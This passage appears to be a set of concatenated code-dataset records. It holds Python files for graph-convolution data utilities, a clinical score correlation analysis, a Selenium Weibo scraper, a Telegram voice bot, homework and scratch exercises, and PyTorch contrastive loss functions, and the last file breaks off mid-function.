ty_extended[test_idx_range-allx.shape[0], :] = ty\n ty = ty_extended\n\n features = sp.vstack((allx, tx)).tolil().toarray()\n print(features)\n features[test_idx_reorder, :] = features[test_idx_range, :]\n\n idx_all = np.setdiff1d(range(len(graph)), isolated_node_idx)\n\n if not os.path.isfile(\"data/planetoid/{}.features.npz\".format(dataset_str)):\n print(\"Creating feature vectors for relations - this might take a while...\")\n features_extended = sp.hstack((features, sp.lil_matrix((features.shape[0], len(isolated_node_idx)))),\n dtype=np.int32).todense()\n features_extended[isolated_node_idx, features.shape[1]:] = np.eye(len(isolated_node_idx))\n features = sp.csr_matrix(features_extended)\n print(\"Done!\")\n save_sparse_csr(\"data/planetoid/{}.features\".format(dataset_str), features)\n else:\n features = load_sparse_csr(\"data/planetoid/{}.features.npz\".format(dataset_str))\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\n\n features = sp.vstack((allx, tx)).tolil()\n features[test_idx_reorder, :] = features[test_idx_range, :]\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\n\n labels = np.vstack((ally, ty))\n labels[test_idx_reorder, :] = labels[test_idx_range, :]\n\n idx_test = test_idx_range.tolist()\n idx_train = range(len(y))\n idx_val = range(len(y), len(y)+500)\n\n train_mask = sample_mask(idx_train, labels.shape[0])\n val_mask = sample_mask(idx_val, labels.shape[0])\n test_mask = sample_mask(idx_test, labels.shape[0])\n\n y_train = np.zeros(labels.shape)\n y_val = np.zeros(labels.shape)\n y_test = np.zeros(labels.shape)\n y_train[train_mask, :] = labels[train_mask, :]\n y_val[val_mask, :] = labels[val_mask, :]\n y_test[test_mask, :] = labels[test_mask, :]\n np.savetxt('labels',labels)\n\n return adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask\n\n\ndef sparse_to_tuple(sparse_mx):\n \"\"\"Convert sparse matrix to tuple representation.\"\"\"\n def to_tuple(mx):\n if not sp.isspmatrix_coo(mx):\n mx = mx.tocoo()\n coords = np.vstack((mx.row, mx.col)).transpose()\n values = mx.data\n shape = mx.shape\n return coords, values, shape\n\n if isinstance(sparse_mx, list):\n for i in range(len(sparse_mx)):\n sparse_mx[i] = to_tuple(sparse_mx[i])\n else:\n sparse_mx = to_tuple(sparse_mx)\n\n return sparse_mx\n\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix and convert to tuple representation\"\"\"\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n print(type(features))\n return sparse_to_tuple(features)\n\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef preprocess_adj(adj):\n \"\"\"Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.\"\"\"\n adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))\n return sparse_to_tuple(adj_normalized)\n\n\ndef construct_feed_dict(features, support, labels, labels_mask, placeholders):\n \"\"\"Construct feed dictionary.\"\"\"\n feed_dict = dict()\n feed_dict.update({placeholders['labels']: labels})\n feed_dict.update({placeholders['labels_mask']: labels_mask})\n feed_dict.update({placeholders['features']: features})\n feed_dict.update({placeholders['support'][i]: support[i] for i in range(len(support))})\n feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})\n return feed_dict\n\n\ndef chebyshev_polynomials(adj, k):\n \"\"\"Calculate Chebyshev polynomials up to order k. Return a list of sparse matrices (tuple representation).\"\"\"\n print(\"Calculating Chebyshev polynomials up to order {}...\".format(k))\n\n adj_normalized = normalize_adj(adj)\n laplacian = sp.eye(adj.shape[0]) - adj_normalized\n largest_eigval, _ = eigsh(laplacian, 1, which='LM')\n scaled_laplacian = (2. / largest_eigval[0]) * laplacian - sp.eye(adj.shape[0])\n\n t_k = list()\n t_k.append(sp.eye(adj.shape[0]))\n t_k.append(scaled_laplacian)\n\n def chebyshev_recurrence(t_k_minus_one, t_k_minus_two, scaled_lap):\n s_lap = sp.csr_matrix(scaled_lap, copy=True)\n return 2 * s_lap.dot(t_k_minus_one) - t_k_minus_two\n\n for i in range(2, k+1):\n t_k.append(chebyshev_recurrence(t_k[-1], t_k[-2], scaled_laplacian))\n\n return sparse_to_tuple(t_k)\n\ndef xuxiaowei(adj, content, dataset):\n dataset_str = dataset\n adj=adj.todense()\n sample_num = adj.shape[0]\n sim_t = np.zeros((sample_num,sample_num))\n print (\"adj---start\")\n # compute similar by cost similar\n if dataset_str == 'cora':\n m=5429\n if dataset_str == 'citeseer':\n m=4732\n if dataset_str == 'pubmed':\n m=44338\n if dataset_str == 'nell.0.001':\n m=266144\n if dataset_str == 'fk107':\n m=26717\n sum = np.sum(adj,axis=1)\t#n*1\n sum = sum.astype(\"float64\")\n sum_trans = sum.T\n sum = sum*sum_trans\n sum = sum/(2*m)\n sim_t = sum-adj\n sim_t = np.asarray(sim_t)\n scale = np.max(sim_t)-np.min(sim_t)\n sim_t = sim_t/scale\n return sim_t\n\n\t\ndef shijianbo(adj, content):\n content = content.todense()\n sample_num = content.shape[0]\n sim_c = np.zeros((sample_num,sample_num))\n\n # compute similar by cost similar\n content_t = content.T\n sim_c = np.asarray(content*content_t)\n content_2 = np.multiply(content,content)\n sum = np.sum(content_2,axis=1)\n sum_trans = sum.T\n sum = sum*sum_trans\n sum = np.sqrt(sum)\n min = np.ones((sample_num,sample_num))*1e-10\n sum = sum+min\n sim_c = sim_c/sum\n sim_c = np.asarray(sim_c)\n sim_c_row = np.sum(sim_c,axis=1)\n one_vec = np.ones(sample_num)\n one_vec = one_vec.T\t\t#1*n\n sim_c_row = sim_c_row*one_vec\n sim_c = sim_c/(sim_c_row+min)\n scale = np.max(sim_c)-np.min(sim_c)\n sim_c = sim_c/scale\n\n #KNN\n print (\"content------KNN\")\n k_values=100\n sample_2_final=np.zeros((sample_num,sample_num))\n for i in range(sample_num):\n sample_2_sort=sorted(sim_c[i],reverse=True)\n k_order=0\n for j in range(k_values):\n find_index=np.where(sim_c[i]==sample_2_sort[j])\n for k in range(len(find_index[0])):\n sample_2_final[i][find_index[0][k]]=sample_2_sort[j]\n k_order+=1\n if (k_order==k_values):\n break\n if (k_order==k_values):\n break\n print (\"content------KNN---end\")\n print (np.max(sample_2_final))\n #sample_2_final=sim_c\n return sample_2_final\n\t\ndef NMI(A,B):\n B=np.argmax(B,axis=1)\n # len(A) should be equal to len(B)\n total = len(A)\n A_ids = set(A)\n B_ids = set(B)\n #Mutual information\n MI = 0\n eps = 1.4e-45\n a=0\n for idA in A_ids:\n for idB in B_ids:\n if(idA>0):\n a=1\n if(a==1):\n idAOccur = np.where(A==idA)\n idBOccur = np.where(B==idB)\n idABOccur = np.intersect1d(idAOccur,idBOccur)\n px = 1.0*len(idAOccur[0])/total\n py = 1.0*len(idBOccur[0])/total\n pxy = 1.0*len(idABOccur)/total\n MI = MI + pxy*math.log(pxy/(px*py)+eps,2)\n # Normalized Mutual information\n Hx = 0\n for idA in A_ids:\n idAOccurCount = 1.0*len(np.where(A==idA)[0])\n Hx = Hx - (idAOccurCount/total)*math.log(idAOccurCount/total+eps,2)\n Hy = 0\n for idB in B_ids:\n idBOccurCount = 1.0*len(np.where(B==idB)[0])\n Hy = Hy - (idBOccurCount/total)*math.log(idBOccurCount/total+eps,2)\n MIhat = 2.0*MI/(Hx+Hy)\n return MIhat","sub_path":"gcn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187448441","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport pandas as pd\nimport nibabel as nib\nimport json\nfrom nilearn import plotting\nfrom nilearn import image\nfrom scipy.stats.stats import pearsonr\nimport shutil\nimport scipy.stats\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport parsimony.utils.check_arrays as check_arrays\nfrom sklearn import preprocessing\nimport statsmodels.api as sm\nfrom statsmodels.formula.api import ols\nimport seaborn as sns\n\nDATA_PATH = \"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/data\"\nINPUT_CLINIC_FILENAME = \"/neurospin/abide/schizConnect/data/december_2017_clinical_score/schizconnect_COBRE_assessmentData_4495.csv\"\nU_all = np.load(\"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/results/clustering/U_scores_corrected/U_all.npy\")\ny_all = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/VBM/all_subjects/data/y.npy\")\n\n\n\npop = pd.read_csv(os.path.join(DATA_PATH,\"pop_cobre_scz.csv\"))\nclinic = pd.read_csv(INPUT_CLINIC_FILENAME)\nage = pop[\"age\"].values\nsex = pop[\"sex_num\"].values\n\ny = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/VBM/all_subjects/data/y.npy\")\nsite = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/VBM/all_subjects/data/site.npy\")\nsite = site[y==1]\nlabels_cluster = np.load(\"/neurospin/brainomics/2016_schizConnect/\\\n2018_analysis_2ndpart_clinic/results/clustering/corrected_results/\\\ncorrection_age_sex_site/clusters_with_controls/2_clusters_solution/labels_cluster.npy\")\nlabels_cluster = labels_cluster[site==1]\nU0 =U_all[:,0][y_all==1][site==1]\n\n\ndf_scores = pd.DataFrame()\ndf_scores[\"subjectid\"] = pop.subjectid\nfor score in clinic.question_id.unique():\n df_scores[score] = np.nan\n\nfor s in pop.subjectid:\n curr = clinic[clinic.subjectid ==s]\n for key in clinic.question_id.unique():\n if curr[curr.question_id == key].empty == False:\n df_scores.loc[df_scores[\"subjectid\"]== s,key] = curr[curr.question_id == key].question_value.values[0]\n\n\n\n################################################################################\n\ndf_stats = pd.DataFrame(columns=[\"r\",\"p\"])\ndf_stats.insert(0,\"clinical_scores\",clinic.question_id.unique())\n################################################################################\noutput = \"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/\\\nresults/clustering/corrected_results/correction_age_sex_site/clusters_with_controls/\\\n2_clusters_solution/cobre/cobre_correlation_clinics_p_values.csv\"\n\nkey_of_interest= list()\nfor key in clinic.question_id.unique():\n try:\n neurospycho = df_scores[key].astype(np.float).values\n\n df = pd.DataFrame()\n df[key] = neurospycho[np.array(np.isnan(neurospycho)==False)]\n df[\"age\"] = age[np.array(np.isnan(neurospycho)==False)]\n df[\"sex\"] = sex[np.array(np.isnan(neurospycho)==False)]\n df[\"labels\"]=labels_cluster[np.array(np.isnan(neurospycho)==False)]\n df[\"U0\"]=U0[np.array(np.isnan(neurospycho)==False)]\n r,p = scipy.stats.pearsonr(df[\"U0\"],df[key])\n\n df_stats.loc[df_stats.clinical_scores==key,\"r\"] = r\n df_stats.loc[df_stats.clinical_scores==key,\"p\"] = p\n if p<0.05:\n print(key)\n print(p)\n key_of_interest.append(key)\n\n\n except:\n df_stats.loc[df_stats.clinical_scores==key,\"r\"] = np.nan\n df_stats.loc[df_stats.clinical_scores==key,\"p\"] = np.nan\ndf_stats.to_csv(output)\n\n\n\n\n################################################################################\noutput = \"/neurospin/brainomics/2016_schizConnect/2018_analysis_2ndpart_clinic/\\\nresults/clustering/corrected_results/correction_age_sex_site/clusters_with_controls/\\\n2_clusters_solution/cobre/correlations\"\n\n\nfor key in key_of_interest:\n plt.figure()\n df = pd.DataFrame()\n neurospycho = df_scores[key].astype(np.float).values\n df[key] = neurospycho[np.array(np.isnan(neurospycho)==False)]\n df[\"age\"] = age[np.array(np.isnan(neurospycho)==False)]\n df[\"sex\"] = sex[np.array(np.isnan(neurospycho)==False)]\n df[\"labels\"]=labels_cluster[np.array(np.isnan(neurospycho)==False)]\n df[\"U0\"]=U0[np.array(np.isnan(neurospycho)==False)]\n r,p = scipy.stats.pearsonr(df[\"U0\"],df[key])\n df['color']= np.where( df['labels']==True , \"r\", \"g\")\n D_color_label = {\"r\":\"Cluster 2\",\"g\":\"Cluster 1\"}\n colors = list(set(df[\"color\"]))\n labels = [D_color_label[x] for x in set(df[\"color\"])]\n\n ax = sns.regplot(data = df, x =\"U0\",y=key,scatter_kws={'facecolors':df['color'],'s':50})\n ind = 0\n for i, grp in df.groupby(['color']):\n grp.plot(kind = 'scatter', x = 'U0', y = key, c = i, ax = ax, label = labels[ind], zorder = 0)\n ind += 1\n ax.legend()\n plt.title(\"Pearson corr: R = %s, and p= %s\"%(r,p))\n plt.savefig(os.path.join(output,\"%s.png\"%key))\n\n\n\n#from scipy import stats\n#slope, intercept, r_value, p_value, std_err = stats.linregress(df[\"U0\"],df[key])\n#print(slope, intercept, r_value, p_value, std_err)","sub_path":"2016_schizConnect/2018_analysis_2ndpart_clinic/clustering_based_on_PCs/corrected/correction_age_sex_site/clusters_with_controls/2_clusters_solution/02_clusters_correlationscobre.py","file_name":"02_clusters_correlationscobre.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"142447636","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nbrower=webdriver.Safari()\nurl='https://weibo.com'\nbrower.get(url)\ntime.sleep(10)\nwait = WebDriverWait(brower, 10)\nbrower.maximize_window()\ntry:\n time.sleep(1)\n clic = brower.find_element_by_xpath('//a[@href=\"javascript:void(0)\"]')\n time.sleep(1)\n clic.click()\nexcept:\n brower.quit()\n print('error')\ntry:\n time.sleep(1)\n clic = brower.find_element_by_xpath('//a[@action-data=\"tabname=qrcode\"]')\n clic.click()\nexcept:\n brower.quit()\n print('error')\ntry:\n time.sleep(5)\n s=input('enter yes to confirm you have scan the code')\n if s!='':\n brower.refresh()\n inp = brower.find_element_by_xpath('//input[@node-type=\"searchInput\"]')\n time.sleep(3)\n inp.send_keys('乘风破浪的姐姐')\nexcept:\n brower.quit()\n print('error')\ntry:\n time.sleep(1)\n clic = brower.find_element_by_xpath('//a[@node-type=\"searchSubmit\"]')\n time.sleep(1)\n clic.click()\nexcept:\n brower.quit()\n print('error')\nfile1=open('demo1.txt','w')#微博和评论\nfile2=open('demo2.txt','w')#仅微博\nfile3=open('demo3.txt','w')#仅评论\nfor i in range(20):\n try:\n time.sleep(3)\n clics = brower.find_elements_by_xpath('//a[@action-type=\"feed_list_comment\"]')\n for clic in clics:\n clic.send_keys(Keys.ENTER)\n time.sleep(1)\n clics = brower.find_elements_by_xpath('//a[@action-type=\"fl_unfold\"]')\n for clic in clics:\n clic.send_keys(Keys.ENTER)\n time.sleep(1)\n time.sleep(1)\n txts = brower.find_elements_by_xpath('//p[@node-type=\"feed_list_content\"]')\n time.sleep(1)\n comments = brower.find_elements_by_xpath('//div[@class=\"card-together\"]')\n time.sleep(1)\n for txt, comment in zip(txts, comments):\n file1.writelines('-----微博正文-----')\n file1.writelines(txt.text)\n file2.writelines(txt.text)\n #print(txt.text)\n try:\n infos = comment.find_elements_by_xpath('//div[@class=\"txt\"]')\n for info in infos:\n file1.writelines(info.text)\n file3.writelines(info.text)\n #print(info.text)\n except:\n file1.writelines('no comment!')\n file3.writelines('no comment!')\n try:\n clic = brower.find_element_by_xpath('//a[@class=\"next\"]')\n clic.send_keys(Keys.ENTER)\n except:\n brower.quit()\n except:\n brower.quit()\n print('error')\nbrower.quit()\n\n\n","sub_path":"爬虫版本迭代过程/crawler3.0.py","file_name":"crawler3.0.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"41174152","text":"# -*- coding: utf-8 -*-\nimport config\nimport telebot\nimport os\nimport time\nbot = telebot.TeleBot(config.TOKEN)\n\n@bot.message_handler(commands=['test'])\ndef find_file_ids(message):\n for file in os.listdir('.venv/botbrein/music/'):\n if file.split('.')[-1] == 'ogg':\n f = open('.venv/botbrein/music/'+file, 'rb')\n msg = bot.send_voice(message.chat.id, f, None)\n # отправка file_id:\n bot.send_message(message.chat.id, msg.voice.file_id, reply_to_message_id=msg.message_id)\n time.sleep(3)\n\nif __name__ == '__main__':\n bot.infinity_polling()\n","sub_path":"Downloadmusicbot.py","file_name":"Downloadmusicbot.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119884129","text":"import time\nfrom decimal import Decimal\ntask_2_a = lambda element: element % 2 == 0 and 1 < element < 100 and element % 10 != 0\ntask_2_b = lambda elem: elem // 2 if elem % 2 == 0 else elem * 2\ntask_2_c = lambda result, a: result + len([a for a in a if a.islower()])\ntask_2_d = lambda i: sum([i for i in i if i >= 0]) / len([i for i in i if i >= 0])\n\n\ndef task_3(is_slow=False):\n a, b = 0, 1\n while a < 1000000000:\n if is_slow:\n time.sleep(0.5)\n yield a\n a, b = b, a+b\n\n\ndef task_4(func):\n def new_func(*args, **kwargs):\n new_args = [arg for arg in args]\n arguments = []\n kwargs_keys = [key for key in kwargs]\n kwargs_values = []\n for i in new_args:\n if isinstance(i, (int, float, Decimal)) and not isinstance(i, bool):\n a = -i\n arguments.append(a)\n elif isinstance(i, (str, list)):\n a = i[::-1]\n arguments.append(a)\n elif isinstance(i, dict):\n a = {key[::-1]: value for key, value in i.items()}\n arguments.append(a)\n elif isinstance(i, bool):\n if i is True:\n arguments.append(False)\n else:\n arguments.append(True)\n for value in kwargs.values():\n if isinstance(value, (int, float, Decimal)) and not isinstance(value, bool):\n b = -value\n kwargs_values.append(b)\n elif isinstance(value, (str, list)):\n b = value[::-1]\n kwargs_values.append(b)\n elif isinstance(value, dict):\n b = {key[::-1]: value for key, value in value.items()}\n kwargs_values.append(b)\n elif isinstance(value, bool):\n if value is True:\n kwargs_values.append(False)\n else:\n kwargs_values.append(True)\n kwargs_dict = dict(zip(kwargs_keys, kwargs_values))\n dict3 = dict(sorted([(key, value) for (key, value) in kwargs_dict.items()])[:5])\n return func(*arguments[:5], **dict3)\n return new_func\n\n\n\n","sub_path":"homework_old/homework3_5.py","file_name":"homework3_5.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"199379361","text":"#coding=utf-8\n\n\n'''\nnameA = input(\"輸入A同學姓名: \")\nscoreA = input(\"輸入A同學分數: \")\nnameB = input(\"輸入B同學姓名: \")\nscoreB = input(\"輸入B同學分數: \")\nprint(\"姓名\\t分數\")\nprint(nameA+\"\\t\"+scoreA)\nprint(nameB+\"\\t\"+scoreB)\n'''\n\n'''\nmoney = 1000\nfor i in range(20):\n\tmoney *= 1.005\n\t\nprint(money)\nprint(1000*(1.005**20))\n'''\n'''\nspeed = 100*128\nfile = 256*1024\nprint(file/speed)\n'''\n'''\nstr = \"PLEASE CONVERT THIS SENTENCE TO LOWER CASE.\"\nprint(str.lower())\t#變小寫\n'''\n'''\nborn = input(\"出生\")\nnow = input(\"現在\")\nage = int(now) - int(born)\nprint(\"%d\" %age)\n'''\n'''\ncard = input(\"卡號: \")\nprint(\"%016d\" %int(card))\n'''\n'''\nyear = input(\"年\")\nmonth = input(\"月\")\nday = input(\"日\")\nprint(\"%d.%02d.%02d\" %(int(year),int(month),int(day) ) )\n'''\n\n'''\ntest = \"I can\\n hi\\t\"\n#(arr,arr2) = test.split('.')\narr = test.split()\nprint(arr)\n#print(arr2)\n'''\n\n'''\narr = [123, \"betty\", 123.5, 'c']\n\nfor x in arr:\n print(x)\n'''\n\n'''\nscores = {}\nresult_f = open(\"Result.txt\")\nfor line in result_f:\n (name, score) = line.split()\n scores[score] = name\nresult_f.close()\n\n\nfor key in sorted(scores.keys(), reverse = True):\n print(scores[key] + \" \" + key)\n#test print scores\n#print(\"\\n\" + scores[\"7.81\"])\n'''\n\n'''\ndef changeBarHelper(variable):\n variable = variable * 2\n return variable\n\n\nbar = 20\nprint(bar)\nbar = changeBarHelper(bar)\nprint(bar)\n'''\n\n'''\ndef outer(x, y):\n #def inner(a = x, b = y):\n # print(\"1\")\n # return a*b\n\n #print(\"2\")\n #return inner\n return lambda a = x, b = y: a*b\n\nx = outer(2,4)\nprint (\"output: \" + str(x()))\n'''\n\n'''\ndef outer(x):\n fillin = [None]\n def inner(i, self = fillin):\n print(i)\n if i: self[0](i-1)\n\n fillin[0] = inner\n print(\"hi\")\n inner(x)\n\nprint(outer(3))\n'''\n\n'''\nclass ThirdClass:\n def __init__(self, value):\n print(\"init\")\n self.data = value\n def __add__(self, other):\n print(\"add\")\n return ThirdClass(self.data + other)\n def __mul__(self, other):\n print(\"mul\")\n #return ThirdClass(self.data * other)\n return ThirdClass(self.data + other)\n def display(self):\n print('Current value = \"%s\" ' %self.data)\n\n \n\na = ThirdClass(\"abc\")\na.display()\nprint(\"----------\")\nb = a + 'xyz'\nb.display()\n#print(\"----------\")\n#b * 3\n#b.display()\nprint(\"----------\")\nc = a*'xyz'\nc.display()\n'''\n'''\nimport json #內建模組\n\njsondata = {\"responseData\": {\"translatedText\":\"hello!\"},\n \"responseDetails\": None,\n \"responseStatus\": 200}\nencodetext = json.dumps(jsondata)\ndecode = json.loads(encodetext)\n\nprint(type(encodetext))\nprint(encodetext)\n\nprint(type(decode))\nprint(decode)\n\nprint(decode['responseData']['translatedText'])\nprint(decode[\"responseStatus\"])\n'''\n'''\njsondata = '{\"responseData\": {\"translatedText\":\"蟒蛇石頭!\"}, \"responseDetails\": null, \"responseStatus\": 200}'\ntext = json.loads(jsondata)\nprint('翻譯結果:',text['responseData']['translatedText'])\n'''\n\n'''\nnum = 5\ndef change_dict(in_dict):\n global num\n in_dict[str(num)] = 'E'\n num += 1\n print(\"in: \", in_dict)\n\ndict1 = {'1':'A', '2':'B', '3':'C', '4':'D'}\ndict2 = dict()\nfor num2 in range(0,3):\n\n change_dict(dict2)\n dict1.update(dict2)\n\n print(dict2)\n #dict2.clear()\n\nprint(dict1)\n\ndict 就算不傳進 function 也可以做修改\n只是好像不太建議\n'''\n\n'''\ndict1 = {'1':'A', '2':'B', '3':'C', '4':'D'}\nprint(len(dict1))\ndict1['5'] = dict1.pop('1')\nprint(dict1)\nprint(len(dict1))\n'''\n\n'''\nimport os\nimport re\n\nurl = \"/smw/index.php?title=Special:RecentChangesLinked\"\nstr1 = os.path.splitext(url)[-1]\nstr2 = str1.find(\"?\")\nprint(str1[:str2])\nprint(str2)\n'''\n\n'''\ndict1 = {'1':'A', '2':'B', '3':'C'}\ntest = dict1.get('4')\nprint(test)\nprint(type(test))\n'''\n\n'''\nfile1 = open('test.txt', 'r', encoding='utf-8')\nfor content in file1.readlines():\n str1 = content\n\nprint(str1)\nprint(len(str1))\n\nwrite_f = open('test2.txt', 'wb')\nwrite_f.write(str1.encode('utf-8'))\n\nwrite_f.close()\nprint(\"=====\")\nfile2 = open('test2.txt', 'rb')\n\nbyte = file2.read(3)\nwhile byte != b'':\n print(byte)\n print(byte.decode('UTF-8'))\n byte = file2.read(3)\n'''\n\n'''\nstr1 = \"你給我試試看ㄚㄚㄚㄚ\"\nfile3 = open('test3.txt', 'wb')\nfile3.write(str1.encode('utf-8'))\n\nfile3.close()\nprint(\"=====\")\nfile4 = open('test3.txt', 'rb')\n\nbyte = file4.read(3)\nwhile byte != b'':\n print(byte)\n print(byte.decode('UTF-8'))\n byte = file4.read(3)\n'''\n\n'''\ntest = \"happy birthday\"\ntest2 = test.find(\"y\", 3)\nprint(test2)\n\nc = \"What is real? How do you define real? \"\nprint(c.count(\"real\", 10))\n'''\n\n'''\nimport threading, time\n\nclass Thread (threading.Thread): # 繼承 Thread 類別\n def __init__(self, no, interval):\n threading.Thread.__init__(self)\n self.no = no\n self.interval = interval\n\n def run(self):\n global test1\n test1()\n time.sleep(self.interval)\n print('Thread '+str(self.no))\n\ndef test1():\n print(\"hi\")\n\nsource = \"test\"\n\ndef test():\n thread1 = Thread(1,5)\n thread2 = Thread(2,3)\n thread1.start()\n thread2.start()\n\nif __name__ == '__main__':\n test()\n'''\n\n'''\nimport os\nfor f in os.listdir(\"data/\"):\n print(type(f))\n'''\n\nstr1 = '請問Note 4 跟 iphone 6 plus那個好呢?\\n_1.txt'\n\ndef special_handle(str1):\n str1 = ''.join(str1.split('?'))\n str1 = ''.join(str1.split('\\\\'))\n str1 = ''.join(str1.split('/'))\n str1 = ''.join(str1.split(':'))\n str1 = ''.join(str1.split('|'))\n str1 = ''.join(str1.split('<'))\n str1 = ''.join(str1.split('>'))\n str1 = ''.join(str1.split('\"'))\n str1 = ''.join(str1.split('*'))\n str1 = ''.join(str1.split('\\n'))\n return str1\n\nstr1 = special_handle(str1)\nprint(type(str1))\nprint(str1)\n","sub_path":"Project/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"641875390","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom utils.utils import *\nfrom torch.autograd import Variable\nimport numpy as np\n\nclass contrastive_loss(nn.Module):\n \"\"\"\n no-change,0\n change,1\n \"\"\"\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6):\n super(contrastive_loss, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n\n def forward(self, x1, x2, label):\n diff = torch.abs(x1 - x2)\n dist_sq = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist = torch.sqrt(dist_sq)\n\n total = np.prod(label.size())\n refer = 1-label\n neg_dis = torch.clamp(dist - self.margin1, min=0.0)\n loss1 = refer * (neg_dis.pow(2))\n loss_1 = torch.sum(loss1)\n\n pos_dis = torch.clamp(self.margin2 - dist, min=0.0)\n loss2 = label * (pos_dis.pow(2)) * 10.0\n loss_2 = torch.sum(loss2)\n loss = (loss_1 + loss_2) / total\n return loss\n\nclass BCL_v2(nn.Module):\n \"\"\"\n batch-balanced contrastive loss\n no-change,0\n change,1\n \"\"\"\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6):\n super(BCL_v2, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n\n def forward(self, x1, x2, label):\n diff = torch.abs(x1 - x2)\n dist_sq = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist = torch.sqrt(dist_sq)\n\n pos_num = torch.sum((label==1).float())+0.0001\n neg_num = torch.sum((label==0).float())+0.0001\n\n refer = 1-label\n neg_dis = torch.clamp(dist - self.margin1, min=0.0)\n loss1 = refer * (neg_dis.pow(2))\n loss_1 = torch.sum(loss1) /neg_num\n\n pos_dis = torch.clamp(self.margin2 - dist, min=0.0)\n loss2 = label * (pos_dis.pow(2))\n loss_2 = torch.sum(loss2) / pos_num\n loss = loss_1 + loss_2\n return loss\n\nclass BCLwithUncertainty_v1(nn.Module):\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6, gamma=2):\n super(BCLwithUncertainty_v1, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n self.gamma = gamma\n self.avgpool = nn.AvgPool2d(kernel_size=3, stride=1, padding=1)\n\n def forward(self, x1, x2, label):\n diff = x1 - x2\n dist = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist_sq = torch.sqrt(dist)\n pos_num = torch.sum((label==1).float()) + 0.001\n neg_num = torch.sum((label==0).float()) + 0.001\n\n smooth_label = torch.pow(self.avgpool(label), self.gamma)\n smooth_refer = torch.pow((1-self.avgpool(label)), self.gamma)\n refer = 1 - label\n\n neg_dis = torch.clamp(dist_sq - self.margin1, min=0.0)\n loss_neg = (refer + smooth_refer) * neg_dis\n loss_1 = torch.sum(loss_neg) / neg_num\n\n pos_dis = torch.clamp(self.margin2 - dist_sq, min=0.0)\n loss_pos = (label + smooth_label) * pos_dis\n loss_2 = torch.sum(loss_pos) / pos_num\n loss_dis = loss_1 + loss_2\n return loss_dis\n\nclass BCLwithUncertainty_v2(nn.Module):\n def __init__(self, margin1=0.1, margin2=1.8, eps=1e-6):\n super(BCLwithUncertainty_v2, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n self.avgpool = nn.AvgPool2d(kernel_size=3, stride=1, padding=1)\n\n def forward(self, x1, x2, label):\n diff = x1 - x2\n dist = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist_sq = torch.sqrt(dist)\n pos_num = torch.sum((label==1).float()) + 0.001\n neg_num = torch.sum((label==0).float()) + 0.001\n\n x = self.avgpool(label)\n weight = 0.8 - 4 * torch.pow(x, 2) + 4 * x\n\n refer = 1 - label\n neg_dis = torch.clamp(dist_sq - self.margin1, min=0.0)\n loss_neg = refer * neg_dis * weight\n loss_1 = torch.sum(loss_neg) / neg_num\n\n pos_dis = torch.clamp(self.margin2 - dist_sq, min=0.0)\n loss_pos = label * pos_dis * weight\n loss_2 = torch.sum(loss_pos) / pos_num\n loss_dis = loss_1 + loss_2\n return loss_dis\n\ndef cross_entropy_2d(predict, target):\n \"\"\"\n Args:\n predict:(n, c, h, w)\n target:(n, h, w)\n \"\"\"\n assert predict.dim() == 4\n assert target.dim() == 3\n assert predict.size(0) == target.size(0)\n assert 